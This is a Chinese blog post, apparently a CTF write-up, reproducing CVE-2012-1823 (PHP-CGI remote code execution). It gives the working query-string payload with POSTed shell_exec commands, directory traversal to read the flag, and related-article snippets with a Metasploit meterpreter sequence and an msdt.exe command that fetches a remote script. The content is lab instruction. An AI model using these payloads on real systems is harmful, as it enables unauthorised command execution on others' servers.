漏洞复现之CVE-2012-1823(PHP-CGI远程代码执行)

于 2024-06-18 15:23:06 发布
阅读量398 收藏 1
点赞数 5
文章标签: 网络安全 python php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ASD830/article/details/139774557
版权

关于CGI知识点
CGI模式下的参数:

-c 指定php.ini文件的位置
-n 不要加载php.ini文件
-d 指定配置项
-b 启动fastcgi进程
-s 显示文件源码
-T 执行指定次该文件
-h和-? 显示帮助

题目如下图,没有什么发现


目录扫描一下

dirsearch -u http://47.96.234.169:32349/


发现info.php,直接访问/info.php


可以发现其php版本为5.4.1,而且可以看到一个cve字样:cve20121823
参考博客[CVE-2012-1823(PHP-CGI远程代码执行)_cve20121823-CSDN博客]
然后我们使用burp抓包,便于观察回显

首先我们使用-s命令查看一下源代码


可以准确得到源码<?php phpinfo();

接着我们使用-d 指定配置项,这里我们可以结合post请求执行命令

?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input #payload

<?php echo shell_exec('whoami');?>   #post请求内容


可以看到当前用户的名称为“www-data”
然后我们使用ls命令列一下目录


得到index.php和info.php,使用cat命令查看一下index.php


提示我们这里没什么东西,我们猜测flag可能在根目录下,目录穿越一下

ls ../../../


发现flag,查看即可得到flag{32a52c19-c1db-4479-ac54-ab59d8d45977}

cat ../../../flag

R3de3m
关注
  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
0xSec
06-08 2925
2024年6月,PHP官方发布新版本,修复了PHP-CGI中一个远程代码执行漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可获取操作系统权限,建议所有使用受影响版本的企业尽快升级修复,以确保安全。
CVE-2012-1823漏洞复现
qq_46804551的博客
05-27 564
前言 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。 CGI即通用网关接口(Common Gateway Interface),它是一段程序, 通俗的讲CGI就象是一座桥,把网页和WEB服务器中的执行程序连接起来,它把HTML接收的指令传递给服务器的执行程序,再把服务器执行程序的结果返还给HTML页。 复现 在相应的漏洞
CVE-2012-1823
qq_53063436的博客
01-05 2136
CVE-2012-1823详细介绍 漏洞复现(靶场为ctfshow) 利用 http://url/index.php?-s 判断是否存在漏洞 若出现源码组存在 bp抓包按下面修改 POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 Host: example.com Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (co
CVE-2012-1823PHP-CGI远程代码执行
浅笑996的博客
11-20 4822
基于vulhub漏洞环境: 安装vulhub漏洞环境 https://mp.csdn.net/mdeditor/84102101# CGI模式下的参数: -c 指定php.ini文件的位置 -n 不要加载php.ini文件 -d 指定配置项 -b 启动fastcgi进程 -s 显示文件源码 -T 执行指定次该文件 -h和-? 显示帮助 1.启动漏洞环境 进入 CVE-20...
PHP-CGI远程代码执行漏洞CVE-2012-1823
orchid_sea的博客
07-19 2640
在启动docker容器时,提示ServerName错误。将配置文件从容器中复制出来修改,再复制回去。将ServerName位置添加所需IP。检查一下是否修改成功。
php cgi漏洞利用工具 源代码
01-22
cgi mod(cve-2012-1823)最新漏洞,可以批量扫描多网段漏洞,多加利用,可以获取服务器控制权限。
php木马扫描工具
01-15
不错的源码 先解压出来 用D盾扫一下,基本可疑的东西都能扫出来,然后自己打开看一下
CVE-2012-1823:phpcgi 代码执行
Foreverlove112的博客
11-08 1143
CVE-2012-1823:phpcgi 代码执行
CVE-2012-1823 php-cgi漏洞 metasploit利用脚本
收集盒 Book box
07-11 1562
> use exploit/multi/http/php_cgi_arg_injection > set rhost IP > set PAYLOAD php/meterpreter/bind_tcp > exploit
[vulhub]:CVE-2012-1823 php-cgi远程代码执行
qq_43756450的博客
02-28 425
[vulhub]:CVE-2012-1823 php-cgi远程代码执行 Author:badbird Time:2020-2-6 该漏洞只出现在以cgi模式运行的php中。影响范围 < 5.3.12 < 5.4.2 0x01 预备知识 ​ 什么是CGI? ​ Common Gateway Interface 即“通用网关接口”。用于处理浏览器(客户端)向服务器发送的数据,在服务器上部署。CGI实际上是一种数据处理的协议,相当于Web服务器“背后的女人”。 ​ CGI做了什么工作?
Cve-2012-1823 PHP CGI Argument Injection Exploit
Yatere的天平秤
05-08 1401
原帖代码地址为: http://www.exploit-db.com/exploits/18836/ 由于其实为py2.x版本服务的,所以我将代码改为py3了。 代码如下: ###################################################################################### # Exploit Title: Cve
cve-2022-30190 msdt远程代码执行漏洞复现
最新发布
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值